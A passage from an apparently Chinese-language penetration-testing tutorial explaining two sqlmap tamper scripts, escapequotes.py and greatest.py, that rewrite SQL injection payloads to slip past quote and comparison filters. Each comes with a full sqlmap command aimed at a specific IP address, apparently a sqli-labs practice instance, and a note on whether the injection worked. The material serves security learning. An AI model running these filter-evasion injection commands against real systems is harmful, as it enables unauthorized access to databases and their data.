16. escapequotes.py脚本
将单引号转换成\', 双引号就转换成\\" ,一般这种情况是用于过滤了单引号或者是双引号的情况下,适用于所有数据库
实战演示:
测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="escapequotes.py" --proxy="http://127.0.0.1:8080" -batch
发现并没有注入成功,尝试看看brup的抓包情况
发现是针对单引号成功加入了反斜杠
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
17. greatest.py脚本
使用GREATEST函数替换大于号">" ,比如:"1 and bmfx > bmfxx" 替换为"1 and greatest(bmfx,bmfxx+1)=bmfx" 适用于所有数据库
实战演示:
测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="greatest.py" --proxy="http://127.0.0.1:8080" -batch
发现这个绕过参数是可以注入的
看上去并没有在注入的过程中使用,但大意已经表述清楚了。
迷茫的人生,需要不断努力,才能看清远方模糊的志向!